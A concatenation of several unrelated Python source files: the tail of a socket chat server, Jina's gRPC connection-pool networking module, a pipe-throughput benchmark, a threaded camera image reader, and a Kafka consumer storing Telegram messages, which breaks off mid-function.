print("server menunggu koneksi dari client")
#listener socket menunggu koneksi dari client, line di bawah ini bersifat 'blocking'
#artinya, programmnya terhenti di sini sampai ada koneksi ke listenerSocket
handler, addr = listenerSocket.accept()
# once a client has connected, the program continues to this line
print("a client connected from address: {}".format(addr))
t1 = Thread(target=kirim_pesan,args=(handler,))
t2 = Thread(target=terima_pesan,args=(handler,))
t1.start()
t2.start()
t1.join()
t2.join()
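# A minimal sketch of a matching client, reusing the socket/Thread imports above; the
# loopback address and the two-thread layout mirror the server but are illustrative
# assumptions. It is only defined here, and since the join() calls above block
# indefinitely, nothing past them executes anyway.
def example_client(server_ip: str = "127.0.0.1", server_port: int = 2222):
    clientSocket = socket.socket()
    clientSocket.connect((server_ip, server_port))
    def send_loop():
        while True:
            # read a line from the keyboard and send it to the server
            clientSocket.send(input().encode())
    def recv_loop():
        while True:
            # print whatever the server sends back
            print("server : {}".format(clientSocket.recv(1024).decode('utf-8')))
    Thread(target=send_loop).start()
    Thread(target=recv_loop).start()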
|
networking.py
|
import os
import asyncio
import ipaddress
from threading import Thread
from typing import Optional, List, Dict, TYPE_CHECKING, Tuple
from urllib.parse import urlparse
import grpc
from grpc.aio import AioRpcError
from jina.logging.logger import JinaLogger
from jina.proto import jina_pb2_grpc
from jina.enums import PollingType
from jina.helper import get_or_reuse_loop
from jina.types.request import Request
from jina.types.request.control import ControlRequest
from jina.types.request.data import DataRequest
if TYPE_CHECKING:
import kubernetes
class ReplicaList:
"""
Maintains a list of connections to replicas and uses round robin for selecting a replica
"""
def __init__(self):
self._connections = []
self._address_to_connection_idx = {}
self._address_to_channel = {}
self._rr_counter = 0
def add_connection(self, address: str):
"""
Add connection with address to the connection list
:param address: Target address of this connection
"""
if address not in self._address_to_connection_idx:
try:
parsed_address = urlparse(address)
address = parsed_address.netloc if parsed_address.netloc else address
use_https = parsed_address.scheme == 'https'
except:
use_https = False
self._address_to_connection_idx[address] = len(self._connections)
(
single_data_stub,
data_stub,
control_stub,
channel,
) = GrpcConnectionPool.create_async_channel_stub(address, https=use_https)
self._address_to_channel[address] = channel
self._connections.append((single_data_stub, data_stub, control_stub))
async def remove_connection(self, address: str):
"""
Remove connection with address from the connection list
:param address: Remove connection for this address
:returns: The removed connection or None if there was not any for the given address
"""
if address in self._address_to_connection_idx:
self._rr_counter = (
self._rr_counter % (len(self._connections) - 1)
if (len(self._connections) - 1)
else 0
)
idx_to_delete = self._address_to_connection_idx.pop(address)
popped_connection = self._connections.pop(idx_to_delete)
# we should handle graceful termination better, 0.5 is a rather random number here
await self._address_to_channel[address].close(0.5)
del self._address_to_channel[address]
# update the address/idx mapping
for address in self._address_to_connection_idx:
if self._address_to_connection_idx[address] > idx_to_delete:
self._address_to_connection_idx[address] -= 1
return popped_connection
return None
def get_next_connection(self):
"""
Returns a connection from the list. Strategy is round robin
:returns: A connection from the pool
"""
try:
connection = self._connections[self._rr_counter]
except IndexError:
# This can happen as a race condition while removing connections
self._rr_counter = 0
connection = self._connections[self._rr_counter]
self._rr_counter = (self._rr_counter + 1) % len(self._connections)
return connection
def get_all_connections(self):
"""
Returns all available connections
:returns: A complete list of all connections from the pool
"""
return self._connections
def has_connection(self, address: str) -> bool:
"""
Checks if a connection for ip exists in the list
:param address: The address to check
:returns: True if a connection for the ip exists in the list
"""
return address in self._address_to_connection_idx
def has_connections(self) -> bool:
"""
Checks if this contains any connection
:returns: True if any connection is managed, False otherwise
"""
return len(self._address_to_connection_idx) > 0
async def close(self):
"""
Close all connections and clean up internal state
"""
for address in self._address_to_channel:
await self._address_to_channel[address].close(0.5)
self._address_to_channel.clear()
self._address_to_connection_idx.clear()
self._connections.clear()
self._rr_counter = 0
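# Usage note for ReplicaList (an illustrative sketch of the round-robin behaviour above):
#
#     replicas = ReplicaList()
#     replicas.add_connection('localhost:12345')
#     replicas.add_connection('localhost:12346')
#     replicas.get_next_connection()  # stubs for localhost:12345
#     replicas.get_next_connection()  # stubs for localhost:12346
#     replicas.get_next_connection()  # wraps around to localhost:12345
#
# add_connection creates the channel and stubs eagerly via create_async_channel_stub,
# but gRPC channels typically connect lazily, so nothing needs to be listening yet.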
class GrpcConnectionPool:
"""
Manages a list of grpc connections.
:param logger: the logger to use
"""
class _ConnectionPoolMap:
def __init__(self, logger: Optional[JinaLogger]):
self._logger = logger
# this maps deployments to shards or heads
self._deployments: Dict[str, Dict[str, Dict[int, ReplicaList]]] = {}
# dict stores last entity id used for a particular deployment, used for round robin
self._access_count: Dict[str, int] = {}
if os.name != 'nt':
os.unsetenv('http_proxy')
os.unsetenv('https_proxy')
def add_replica(self, deployment: str, shard_id: int, address: str):
self._add_connection(deployment, shard_id, address, 'shards')
def add_head(
self, deployment: str, address: str, head_id: Optional[int] = 0
): # the head_id is always 0 for now, this will change when scaling the head
self._add_connection(deployment, head_id, address, 'heads')
def get_replicas(
self, deployment: str, head: bool, entity_id: Optional[int] = None
) -> ReplicaList:
if deployment in self._deployments:
type = 'heads' if head else 'shards'
if entity_id is None and head:
entity_id = 0
return self._get_connection_list(deployment, type, entity_id)
else:
self._logger.debug(
f'Unknown deployment {deployment}, no replicas available'
)
return None
def get_replicas_all_shards(self, deployment: str) -> List[ReplicaList]:
replicas = []
if deployment in self._deployments:
for shard_id in self._deployments[deployment]['shards']:
replicas.append(
self._get_connection_list(deployment, 'shards', shard_id)
)
return replicas
async def close(self):
# Close all connections to all replicas
for deployment in self._deployments:
for entity_type in self._deployments[deployment]:
for shard_in in self._deployments[deployment][entity_type]:
await self._deployments[deployment][entity_type][
shard_in
].close()
self._deployments.clear()
def _get_connection_list(
self, deployment: str, type: str, entity_id: Optional[int] = None
) -> ReplicaList:
try:
if entity_id is None and len(self._deployments[deployment][type]) > 0:
                    # no specific entity requested: pick one via the per-deployment access counter (round robin)
self._access_count[deployment] += 1
return self._deployments[deployment][type][
self._access_count[deployment]
% len(self._deployments[deployment][type])
]
else:
return self._deployments[deployment][type][entity_id]
except KeyError:
if (
entity_id is None
and deployment in self._deployments
and len(self._deployments[deployment][type])
):
# This can happen as a race condition when removing connections while accessing it
# In this case we don't care for the concrete entity, so retry with the first one
return self._get_connection_list(deployment, type, 0)
self._logger.debug(
f'Did not find a connection for deployment {deployment}, type {type} and entity_id {entity_id}. There are {len(self._deployments[deployment][type]) if deployment in self._deployments else 0} available connections for this deployment and type. '
)
return None
def _add_deployment(self, deployment: str):
if deployment not in self._deployments:
self._deployments[deployment] = {'shards': {}, 'heads': {}}
self._access_count[deployment] = 0
def _add_connection(
self,
deployment: str,
entity_id: int,
address: str,
type: str,
):
self._add_deployment(deployment)
if entity_id not in self._deployments[deployment][type]:
connection_list = ReplicaList()
self._deployments[deployment][type][entity_id] = connection_list
if not self._deployments[deployment][type][entity_id].has_connection(
address
):
self._logger.debug(
f'Adding connection for deployment {deployment}/{type}/{entity_id} to {address}'
)
self._deployments[deployment][type][entity_id].add_connection(address)
else:
self._logger.debug(
f'Ignoring activation of pod, {address} already known'
)
async def remove_head(self, deployment, address, head_id: Optional[int] = 0):
return await self._remove_connection(deployment, head_id, address, 'heads')
async def remove_replica(
self, deployment, address, shard_id: Optional[int] = 0
):
return await self._remove_connection(
deployment, shard_id, address, 'shards'
)
async def _remove_connection(self, deployment, entity_id, address, type):
if (
deployment in self._deployments
and entity_id in self._deployments[deployment][type]
):
self._logger.debug(
f'Removing connection for deployment {deployment}/{type}/{entity_id} to {address}'
)
connection = await self._deployments[deployment][type][
entity_id
].remove_connection(address)
if not self._deployments[deployment][type][entity_id].has_connections():
del self._deployments[deployment][type][entity_id]
return connection
return None
def __init__(self, logger: Optional[JinaLogger] = None):
self._logger = logger or JinaLogger(self.__class__.__name__)
self._connections = self._ConnectionPoolMap(self._logger)
def send_request(
self,
request: Request,
deployment: str,
head: bool = False,
shard_id: Optional[int] = None,
polling_type: PollingType = PollingType.ANY,
endpoint: Optional[str] = None,
) -> List[asyncio.Task]:
"""Send a single message to target via one or all of the pooled connections, depending on polling_type. Convenience function wrapper around send_messages
:param request: a single request to send
:param deployment: name of the Jina deployment to send the message to
:param head: If True it is send to the head, otherwise to the worker pods
:param shard_id: Send to a specific shard of the deployment, ignored for polling ALL
:param polling_type: defines if the message should be send to any or all pooled connections for the target
:param endpoint: endpoint to target with the request
:return: list of asyncio.Task items for each send call
"""
return self.send_requests(
requests=[request],
deployment=deployment,
head=head,
shard_id=shard_id,
polling_type=polling_type,
endpoint=endpoint,
)
def send_requests(
self,
requests: List[Request],
deployment: str,
head: bool = False,
shard_id: Optional[int] = None,
polling_type: PollingType = PollingType.ANY,
endpoint: Optional[str] = None,
) -> List[asyncio.Task]:
"""Send a request to target via one or all of the pooled connections, depending on polling_type
:param requests: request (DataRequest/ControlRequest) to send
:param deployment: name of the Jina deployment to send the request to
        :param head: If True it is sent to the head, otherwise to the worker pods
        :param shard_id: Send to a specific shard of the deployment, ignored for polling ALL
        :param polling_type: defines if the request should be sent to any or all pooled connections for the target
:param endpoint: endpoint to target with the requests
:return: list of asyncio.Task items for each send call
"""
results = []
connections = []
if polling_type == PollingType.ANY:
connection_list = self._connections.get_replicas(deployment, head, shard_id)
if connection_list:
connections.append(connection_list.get_next_connection())
elif polling_type == PollingType.ALL:
connection_lists = self._connections.get_replicas_all_shards(deployment)
for connection_list in connection_lists:
connections.append(connection_list.get_next_connection())
else:
raise ValueError(f'Unsupported polling type {polling_type}')
for connection in connections:
task = self._send_requests(requests, connection, endpoint)
results.append(task)
return results
def send_request_once(
self,
request: Request,
deployment: str,
head: bool = False,
shard_id: Optional[int] = None,
) -> asyncio.Task:
"""Send msg to target via only one of the pooled connections
:param request: request to send
:param deployment: name of the Jina deployment to send the message to
        :param head: If True it is sent to the head, otherwise to the worker pods
:param shard_id: Send to a specific shard of the deployment, ignored for polling ALL
:return: asyncio.Task representing the send call
"""
return self.send_requests_once(
[request], deployment=deployment, head=head, shard_id=shard_id
)
def send_requests_once(
self,
requests: List[Request],
deployment: str,
head: bool = False,
shard_id: Optional[int] = None,
endpoint: Optional[str] = None,
) -> asyncio.Task:
"""Send a request to target via only one of the pooled connections
:param requests: request to send
:param deployment: name of the Jina deployment to send the request to
        :param head: If True it is sent to the head, otherwise to the worker pods
:param shard_id: Send to a specific shard of the deployment, ignored for polling ALL
:param endpoint: endpoint to target with the requests
:return: asyncio.Task representing the send call
"""
replicas = self._connections.get_replicas(deployment, head, shard_id)
if replicas:
connection = replicas.get_next_connection()
return self._send_requests(requests, connection, endpoint)
else:
self._logger.debug(
f'No available connections for deployment {deployment} and shard {shard_id}'
)
return None
def add_connection(
self,
deployment: str,
address: str,
head: Optional[bool] = False,
shard_id: Optional[int] = None,
):
"""
Adds a connection for a deployment to this connection pool
:param deployment: The deployment the connection belongs to, like 'encoder'
:param head: True if the connection is for a head
:param address: Address used for the grpc connection, format is <host>:<port>
:param shard_id: Optional parameter to indicate this connection belongs to a shard, ignored for heads
"""
if head:
self._connections.add_head(deployment, address, 0)
else:
if shard_id is None:
shard_id = 0
self._connections.add_replica(deployment, shard_id, address)
async def remove_connection(
self,
deployment: str,
address: str,
head: Optional[bool] = False,
shard_id: Optional[int] = None,
):
"""
Removes a connection to a deployment
:param deployment: The deployment the connection belongs to, like 'encoder'
:param address: Address used for the grpc connection, format is <host>:<port>
:param head: True if the connection is for a head
:param shard_id: Optional parameter to indicate this connection belongs to a shard, ignored for heads
:return: The removed connection, None if it did not exist
"""
if head:
return await self._connections.remove_head(deployment, address)
else:
if shard_id is None:
shard_id = 0
return await self._connections.remove_replica(deployment, address, shard_id)
def start(self):
"""
Starts the connection pool
"""
pass
async def close(self):
"""
Closes the connection pool
"""
await self._connections.close()
def _send_requests(
self, requests: List[Request], connection, endpoint: Optional[str] = None
) -> asyncio.Task:
# this wraps the awaitable object from grpc as a coroutine so it can be used as a task
# the grpc call function is not a coroutine but some _AioCall
async def task_wrapper(requests, stubs, endpoint):
metadata = (('endpoint', endpoint),) if endpoint else None
for i in range(3):
try:
request_type = type(requests[0])
if request_type == DataRequest and len(requests) == 1:
call_result = stubs[0].process_single_data(
requests[0], metadata=metadata
)
metadata, response = (
await call_result.trailing_metadata(),
await call_result,
)
return response, metadata
if request_type == DataRequest and len(requests) > 1:
call_result = stubs[1].process_data(requests, metadata=metadata)
metadata, response = (
await call_result.trailing_metadata(),
await call_result,
)
return response, metadata
elif request_type == ControlRequest:
call_result = stubs[2].process_control(requests[0])
metadata, response = (
await call_result.trailing_metadata(),
await call_result,
)
return response, metadata
else:
raise ValueError(
f'Unsupported request type {type(requests[0])}'
)
except AioRpcError as e:
if e.code() != grpc.StatusCode.UNAVAILABLE:
raise
elif e.code() == grpc.StatusCode.UNAVAILABLE and i == 2:
self._logger.debug(f'GRPC call failed, retries exhausted')
raise
else:
self._logger.debug(
f'GRPC call failed with StatusCode.UNAVAILABLE, retry attempt {i+1}/3'
)
return asyncio.create_task(task_wrapper(requests, connection, endpoint))
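    # Retry semantics of task_wrapper above: at most 3 attempts, retrying only on
    # StatusCode.UNAVAILABLE; any other gRPC error, or a third UNAVAILABLE, is re-raised.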
@staticmethod
def get_grpc_channel(
address: str,
options: Optional[list] = None,
asyncio: Optional[bool] = False,
https: Optional[bool] = False,
root_certificates: Optional[str] = None,
) -> grpc.Channel:
"""
Creates a grpc channel to the given address
:param address: The address to connect to, format is <host>:<port>
:param options: A list of options to pass to the grpc channel
:param asyncio: If True, use the asyncio implementation of the grpc channel
:param https: If True, use https for the grpc channel
:param root_certificates: The path to the root certificates for https, only used if https is True
:return: A grpc channel or an asyncio channel
"""
secure_channel = grpc.secure_channel
insecure_channel = grpc.insecure_channel
if asyncio:
secure_channel = grpc.aio.secure_channel
insecure_channel = grpc.aio.insecure_channel
if options is None:
options = GrpcConnectionPool.get_default_grpc_options()
if https:
credentials = grpc.ssl_channel_credentials(
root_certificates=root_certificates
)
return secure_channel(address, credentials, options)
return insecure_channel(address, options)
@staticmethod
def activate_worker_sync(
worker_host: str,
worker_port: int,
target_head: str,
shard_id: Optional[int] = None,
) -> ControlRequest:
"""
Register a given worker to a head by sending an activate request
:param worker_host: the host address of the worker
:param worker_port: the port of the worker
:param target_head: address of the head to send the activate request to
:param shard_id: id of the shard the worker belongs to
:returns: the response request
"""
activate_request = ControlRequest(command='ACTIVATE')
activate_request.add_related_entity(
'worker', worker_host, worker_port, shard_id
)
if os.name != 'nt':
os.unsetenv('http_proxy')
os.unsetenv('https_proxy')
return GrpcConnectionPool.send_request_sync(activate_request, target_head)
@staticmethod
async def activate_worker(
worker_host: str,
worker_port: int,
target_head: str,
shard_id: Optional[int] = None,
) -> ControlRequest:
"""
Register a given worker to a head by sending an activate request
:param worker_host: the host address of the worker
:param worker_port: the port of the worker
:param target_head: address of the head to send the activate request to
:param shard_id: id of the shard the worker belongs to
:returns: the response request
"""
activate_request = ControlRequest(command='ACTIVATE')
activate_request.add_related_entity(
'worker', worker_host, worker_port, shard_id
)
return await GrpcConnectionPool.send_request_async(
activate_request, target_head
)
@staticmethod
async def deactivate_worker(
worker_host: str,
worker_port: int,
target_head: str,
shard_id: Optional[int] = None,
) -> ControlRequest:
"""
        Remove a given worker from a head by sending a deactivate request
:param worker_host: the host address of the worker
:param worker_port: the port of the worker
:param target_head: address of the head to send the deactivate request to
:param shard_id: id of the shard the worker belongs to
:returns: the response request
"""
activate_request = ControlRequest(command='DEACTIVATE')
activate_request.add_related_entity(
'worker', worker_host, worker_port, shard_id
)
return await GrpcConnectionPool.send_request_async(
activate_request, target_head
)
@staticmethod
def send_request_sync(
request: Request,
target: str,
timeout=100.0,
https=False,
root_certificates: Optional[str] = None,
endpoint: Optional[str] = None,
) -> Request:
"""
        Sends a request synchronously to the target via grpc
:param request: the request to send
:param target: where to send the request to, like 127.0.0.1:8080
:param timeout: timeout for the send
:param https: if True, use https for the grpc channel
:param root_certificates: the path to the root certificates for https, only used if https is True
:param endpoint: endpoint to target with the request
:returns: the response request
"""
for i in range(3):
try:
with GrpcConnectionPool.get_grpc_channel(
target,
https=https,
root_certificates=root_certificates,
) as channel:
if type(request) == DataRequest:
metadata = (('endpoint', endpoint),) if endpoint else None
stub = jina_pb2_grpc.JinaSingleDataRequestRPCStub(channel)
response, call = stub.process_single_data.with_call(
request, timeout=timeout, metadata=metadata
)
elif type(request) == ControlRequest:
stub = jina_pb2_grpc.JinaControlRequestRPCStub(channel)
response = stub.process_control(request, timeout=timeout)
return response
except grpc.RpcError as e:
if e.code() != grpc.StatusCode.UNAVAILABLE or i == 2:
raise
@staticmethod
def get_default_grpc_options():
"""
Returns a list of default options used for creating grpc channels.
Documentation is here https://github.com/grpc/grpc/blob/master/include/grpc/impl/codegen/grpc_types.h
:returns: list of tuples defining grpc parameters
"""
return [
('grpc.max_send_message_length', -1),
('grpc.max_receive_message_length', -1),
]
@staticmethod
async def send_request_async(
request: Request,
target: str,
timeout: float = 1.0,
https: bool = False,
root_certificates: Optional[str] = None,
) -> Request:
"""
Sends a request asynchronously to the target via grpc
:param request: the request to send
:param target: where to send the request to, like 127.0.0.1:8080
:param timeout: timeout for the send
:param https: if True, use https for the grpc channel
        :param root_certificates: the path to the root certificates for https, only used if https is True
:returns: the response request
"""
async with GrpcConnectionPool.get_grpc_channel(
target,
asyncio=True,
https=https,
root_certificates=root_certificates,
) as channel:
if type(request) == DataRequest:
stub = jina_pb2_grpc.JinaSingleDataRequestRPCStub(channel)
return await stub.process_single_data(request, timeout=timeout)
elif type(request) == ControlRequest:
stub = jina_pb2_grpc.JinaControlRequestRPCStub(channel)
return await stub.process_control(request, timeout=timeout)
@staticmethod
def create_async_channel_stub(
address,
https=False,
root_certificates: Optional[str] = None,
) -> Tuple[
jina_pb2_grpc.JinaSingleDataRequestRPCStub,
jina_pb2_grpc.JinaDataRequestRPCStub,
jina_pb2_grpc.JinaControlRequestRPCStub,
grpc.aio.Channel,
]:
"""
Creates an async GRPC Channel. This channel has to be closed eventually!
        :param address: the address to create the connection to, like 127.0.0.1:8080
        :param https: if True, use https for the grpc channel
        :param root_certificates: the path to the root certificates for https, only used if https is True
:returns: DataRequest/ControlRequest stubs and an async grpc channel
"""
channel = GrpcConnectionPool.get_grpc_channel(
address,
asyncio=True,
https=https,
root_certificates=root_certificates,
)
return (
jina_pb2_grpc.JinaSingleDataRequestRPCStub(channel),
jina_pb2_grpc.JinaDataRequestRPCStub(channel),
jina_pb2_grpc.JinaControlRequestRPCStub(channel),
channel,
)
class K8sGrpcConnectionPool(GrpcConnectionPool):
"""
Manages grpc connections to replicas in a K8s deployment.
:param namespace: K8s namespace to operate in
:param client: K8s client
:param logger: the logger to use
"""
K8S_PORT_EXPOSE = 8080
K8S_PORT_IN = 8081
K8S_PORT_USES_BEFORE = 8082
K8S_PORT_USES_AFTER = 8083
def __init__(
self,
namespace: str,
client: 'kubernetes.client.CoreV1Api',
logger: JinaLogger = None,
):
super().__init__(logger=logger)
self._namespace = namespace
self._process_events_task = None
self._k8s_client = client
self._k8s_event_queue = asyncio.Queue()
self.enabled = False
from kubernetes import watch
self._api_watch = watch.Watch()
self.update_thread = Thread(target=self.run, daemon=True)
async def _fetch_initial_state(self):
namespaced_pods = self._k8s_client.list_namespaced_pod(self._namespace)
for item in namespaced_pods.items:
await self._process_item(item)
def start(self):
"""
Subscribe to the K8s API and watch for changes in Pods
"""
self._loop = get_or_reuse_loop()
self._process_events_task = asyncio.create_task(self._process_events())
self.update_thread.start()
async def _process_events(self):
await self._fetch_initial_state()
while self.enabled:
event = await self._k8s_event_queue.get()
await self._process_item(event)
def run(self):
"""
        Subscribes to MODIFIED events from the list_namespaced_pod K8s API
"""
self.enabled = True
while self.enabled:
for event in self._api_watch.stream(
self._k8s_client.list_namespaced_pod, self._namespace
):
if event['type'] == 'MODIFIED':
asyncio.run_coroutine_threadsafe(
self._k8s_event_queue.put(event['object']), self._loop
)
if not self.enabled:
break
async def close(self):
"""
Closes the connection pool
"""
self.enabled = False
if self._process_events_task:
self._process_events_task.cancel()
self._api_watch.stop()
await super().close()
@staticmethod
def _pod_is_up(item):
return item.status.pod_ip is not None and item.status.phase == 'Running'
@staticmethod
def _pod_is_ready(item):
return item.status.container_statuses is not None and all(
cs.ready for cs in item.status.container_statuses
)
async def _process_item(self, item):
try:
jina_deployment_name = item.metadata.labels['jina_deployment_name']
is_head = item.metadata.labels['pod_type'].lower() == 'head'
shard_id = (
int(item.metadata.labels['shard_id'])
if item.metadata.labels['shard_id'] and not is_head
else None
)
is_deleted = item.metadata.deletion_timestamp is not None
ip = item.status.pod_ip
port = self.K8S_PORT_IN
if (
ip
and port
and not is_deleted
and self._pod_is_up(item)
and self._pod_is_ready(item)
):
self.add_connection(
deployment=jina_deployment_name,
head=is_head,
address=f'{ip}:{port}',
shard_id=shard_id,
)
elif ip and port and is_deleted and self._pod_is_up(item):
await self.remove_connection(
deployment=jina_deployment_name,
head=is_head,
address=f'{ip}:{port}',
shard_id=shard_id,
)
except KeyError:
self._logger.debug(
f'Ignoring changes to non Jina resource {item.metadata.name}'
)
pass
@staticmethod
def _extract_port(item):
for container in item.spec.containers:
if container.name == 'executor':
return container.ports[0].container_port
return None
def is_remote_local_connection(first: str, second: str):
"""
    Decides whether ``first`` is a remote host and ``second`` is localhost
:param first: the ip or host name of the first runtime
:param second: the ip or host name of the second runtime
:return: True, if first is remote and second is local
"""
try:
first_ip = ipaddress.ip_address(first)
first_global = first_ip.is_global
except ValueError:
if first == 'localhost':
first_global = False
else:
first_global = True
try:
second_ip = ipaddress.ip_address(second)
second_local = second_ip.is_private or second_ip.is_loopback
except ValueError:
if second == 'localhost':
second_local = True
else:
second_local = False
return first_global and second_local
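# Illustrative results (based on the ipaddress semantics used above):
#     is_remote_local_connection('8.8.8.8', '127.0.0.1')         # -> True  (global vs loopback)
#     is_remote_local_connection('192.168.1.5', 'localhost')     # -> False (first is private, not global)
#     is_remote_local_connection('some.remote.host', '10.0.0.3') # -> True  (non-"localhost" names count as remote)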
def create_connection_pool(
k8s_connection_pool: bool = False,
k8s_namespace: Optional[str] = None,
logger: Optional[JinaLogger] = None,
) -> GrpcConnectionPool:
"""
Creates the appropriate connection pool based on parameters
:param k8s_namespace: k8s namespace the pool will live in, None if outside K8s
:param k8s_connection_pool: flag to indicate if K8sGrpcConnectionPool should be used, defaults to true in K8s
:param logger: the logger to use
:return: A connection pool object
"""
if k8s_connection_pool and k8s_namespace:
import kubernetes
from kubernetes import client
kubernetes.config.load_incluster_config()
k8s_client = client.ApiClient()
core_client = client.CoreV1Api(api_client=k8s_client)
return K8sGrpcConnectionPool(
namespace=k8s_namespace, client=core_client, logger=logger
)
else:
return GrpcConnectionPool(logger=logger)
def host_is_local(hostname):
"""
    Check if hostname points to localhost
:param hostname: host to check
:return: True if hostname means localhost, False otherwise
"""
import socket
fqn = socket.getfqdn(hostname)
if fqn in ("localhost", "0.0.0.0") or hostname == '0.0.0.0':
return True
return ipaddress.ip_address(hostname).is_loopback
|
static_pipe.py
|
import pandas
import time
import multiprocessing
import os
from buffered_pipe import Static_Pipe
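# What follows is a throughput/latency benchmark: SB runs in a child process and pushes
# the pre-generated byte blobs through the write end of a pipe, stamping the wall-clock
# time before and after; test() receives and verifies every blob in the parent, then
# combines both sides' timestamps into error rate, send/receive time and latency figures
# for each (start method, pipe implementation, parameters) combination.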
def SB(Q, pipe, D):
Q.put(time.time())
list(map(pipe.send_bytes, D))
Q.put(time.time())
def test(cnt, size, Datas, ctx, method, parameters):
Q = ctx.Queue()
if method == 'Static_Pipe':
pipe_r, pipe_w = Static_Pipe(*parameters)
P = ctx.Process(target=SB, args=(Q, pipe_w, Datas))
if method == 'Pipe':
pipe_r, pipe_w = ctx.Pipe(*parameters)
P = ctx.Process(target=SB, args=(Q, pipe_w, Datas))
P.start()
Ts = []
Ts += [time.time()]
error_cnt = sum( exp != pipe_r.recv_bytes() for exp in Datas)
Ts += [time.time()]
P.join()
Ps = [Q.get() for _ in range(Q.qsize())]
return {
"error": error_cnt / cnt
, "execute delay": Ps[0] - Ts[0]
, "send time": Ps[1] - Ps[0]
, "recv time": Ts[1] - Ps[0]
, "last packet delay": Ts[1] - Ps[1]
, "ctx" : type(ctx).__name__
, "method": method
, "parameters": parameters
}
if __name__ == '__main__':
path_info = __file__.split('/')
path_info = '/'.join(path_info[path_info.index('benchmarks'):])
print(path_info)
cnt = 1000000
size = 128
Datas = [os.urandom(size) for _ in range(cnt)]
# pipe_r, pipe_w = multiprocessing.Pipe() #379780.12it/s
# pipe_r, pipe_w = Static_Pipe(size, 512, 1, 0.01) #1194458.16it/s
# pipe_r, pipe_w = Static_Pipe(size, 512, 4, 0.01) #956994.65it/s
results = []
for ctx_method in ['fork', 'spawn', 'forkserver']:
ctx = multiprocessing.get_context(ctx_method)
results += [
test(cnt, size, Datas, ctx, method = "Static_Pipe", parameters = [size, 512, 8, 8, 0.01])
, test(cnt, size, Datas, ctx, method = "Static_Pipe", parameters = [size, 512, 4, 4, 0.01])
, test(cnt, size, Datas, ctx, method = "Static_Pipe", parameters = [size, 512, 2, 2, 0.01])
, test(cnt, size, Datas, ctx, method = "Static_Pipe", parameters = [size, 512, 1, 1, 0.01])
, test(cnt, size, Datas, ctx, method = "Static_Pipe", parameters = [size, 64, 8, 8, 0.01])
, test(cnt, size, Datas, ctx, method = "Static_Pipe", parameters = [size, 64, 4, 4, 0.01])
, test(cnt, size, Datas, ctx, method = "Static_Pipe", parameters = [size, 64, 2, 2, 0.01])
, test(cnt, size, Datas, ctx, method = "Static_Pipe", parameters = [size, 64, 1, 1, 0.01])
, test(cnt, size, Datas, ctx, method = "Pipe", parameters = [True])
, test(cnt, size, Datas, ctx, method = "Pipe", parameters = [False])
]
df = pandas.DataFrame(results)
print(df.to_string())
|
camera_image_source.py
|
import time
from threading import Condition
from threading import Thread
import arc852.cli_args as cli
from arc852.camera import Camera
from arc852.generic_image_source import GenericImageSource
class CameraImageSource(GenericImageSource):
args = [cli.usb_camera, cli.usb_port]
def __init__(self, usb_camera, usb_port):
super(CameraImageSource, self).__init__()
self.__cond = Condition()
self.__cv2_img = None
self.__cam = Camera(usb_camera=usb_camera, usb_port=usb_port)
def start(self):
Thread(target=self.__read_image).start()
def stop(self):
self.__cam.close()
def __read_image(self):
while self.__cam.is_open():
self.__cond.acquire()
self.__cv2_img = self.__cam.read()
if self.__cv2_img is None:
# logger.error("Null image read from camera")
time.sleep(.5)
else:
self.__cond.notify()
self.__cond.release()
def get_image(self):
self.__cond.acquire()
while self.__cv2_img is None:
self.__cond.wait()
retval = self.__cv2_img
self.__cv2_img = None
self.__cond.release()
return retval
|
main.py
|
import json
import threading
from broker import init_kafka_consumer, KafkaTopics
from database import *
import logging
import os
KAFKA_BROKER_INSTANCES = os.environ["KAFKA_BROKER_INSTANCES"].split(",")
LOG_LEVEL = os.environ["LOG_LEVEL"]
logging.basicConfig(level=logging.ERROR, format='%(asctime)s %(levelname)s %(message)s')
logger = logging.getLogger()
if LOG_LEVEL:
level_name = logging.getLevelName(LOG_LEVEL.upper())
logger.setLevel(level_name)
lock = threading.Lock()
class SingletonMeta(type):
""" Singleton metaclass - Implemented with a lock to ensure thread safety."""
_instances = {}
def __call__(cls, *args, **kwargs):
if cls not in cls._instances:
with lock:
if cls not in cls._instances:
cls._instances[cls] = super(SingletonMeta, cls).__call__(*args, **kwargs)
return cls._instances[cls]
class SingletonConsumer(metaclass=SingletonMeta):
""" Singleton class - Implementing kafka consumer in a singleton class to ensure only one instance of consumer is open at a time."""
def get_consumer(self,topic):
consumer = init_kafka_consumer(KAFKA_BROKER_INSTANCES, topic)
return consumer
pass
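# Illustrative check of the double-checked locking above (hypothetical helper, never
# called by the service): constructing SingletonConsumer twice yields the same object.
def _singleton_demo():
    first = SingletonConsumer()
    second = SingletonConsumer()
    assert first is second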
def consume_msgs(topic):
sglcr = SingletonConsumer()
consumer = sglcr.get_consumer(topic)
if not consumer:
logger.error(f"Failed to initialize a consumer for the topic {topic}")
return
for msg in consumer:
try:
msg_json = json.loads(msg.value)
if topic == KafkaTopics.TGMESSAGES.value:
logger.info(f"Retrieved a telegram message from kafka: {msg_json}")
insert_message(msg_json)
elif topic == KafkaTopics.TGCHANNEL_EVENTS.value:
logger.info(f"Retrieved a telegram channel / chat event from kafka: {msg_json}")
insert_chat_event(msg_json)
elif topic == KafkaTopics.TGCHANNEL_LINKS.value:
logger.info(f"Retrieved a telegram invitational link from kafka: {msg_json}")
insert_link_data(msg_json, msg=None, channel_entity=None, from_config=False)
elif topic == KafkaTopics.TGCHANNEL_INFO.value:
logger.info(f"Retrieved a telegram channel information from kafka: {msg_json}")
insert_channel_descr(msg_json)
elif topic == KafkaTopics.CLIENT_INFO.value:
logger.info(f"Retrieved a client information from kafka: {msg_json}")
insert_client_info(msg_json)
elif topic == KafkaTopics.VIEWCOUNT_UPDATE.value:
logger.info(f"Retrieved a tg channel post viewcount update from kafka: {msg_json}")
update_view_count(msg_json)
except Exception as e:
logger.error(f"Failed to store a msg from topic {topic}, with the following error: {e}")
def main():
tgmessages_thread = threading.Thread(target=consume_msgs, args=([KafkaTopics.TGMESSAGES.value]))
tgmessages_thread.start() #messages
tgchannel_events_thread = threading.Thread(target=consume_msgs, args=([KafkaTopics.TGCHANNEL_EVENTS.value]))
tgchannel_events_thread.start() #events
tgchannel_info_thread = threading.Thread(target=consume_msgs, args=([KafkaTopics.TGCHANNEL_INFO.value]))
tgchannel_info_thread.start() #channel info and descr
tgchannel_links_thread = threading.Thread(target=consume_msgs, args=([KafkaTopics.TGCHANNEL_LINKS.value]))
tgchannel_links_thread.start() #channel invite links
tgchannel_participants_count_thread = threading.Thread(target=consume_msgs, args=([KafkaTopics.TGCHANNEL_PARTICIPANTS_COUNT.value]))
